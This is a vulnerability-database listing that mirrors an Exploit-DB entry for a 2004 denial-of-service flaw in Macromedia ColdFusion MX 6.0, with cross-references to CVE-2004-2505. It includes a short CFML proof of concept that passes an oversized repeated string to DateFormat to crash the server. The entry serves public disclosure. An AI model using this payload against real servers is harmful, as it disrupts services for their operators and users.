Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbK. K. MookheyEDB-ID:24013
HistoryApr 17, 2004 - 12:00 a.m.

Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service

2004-04-1700:00:00
K. K. Mookhey
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/10163/info

A denial of service vulnerability has been reported in Macromedia ColdFusion MX that is reported to occur when the software attempts to write oversized error messages. These error messages will be logged by the server but may also be written into dynamically generated error pages.

It is possible to trigger this condition remotely since remote users may influence the contents of error messages.

<cfset
longstr = RepeatString("1234567890123456789012345678901234567890", 10000)
>
<cfset the_date = #DateFormat(longstr)#>
<cfoutput>#the_date#</cfoutput>

Related

cvelist 1
cve 1
nvd 1
cvelist
cvelist
CVE-2004-2505
2005-10-25 04:00:00
cve
cve
CVE-2004-2505
2005-10-25 04:00:00
nvd
nvd
CVE-2004-2505
2004-12-31 05:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:24013
cvelist1cve1nvd1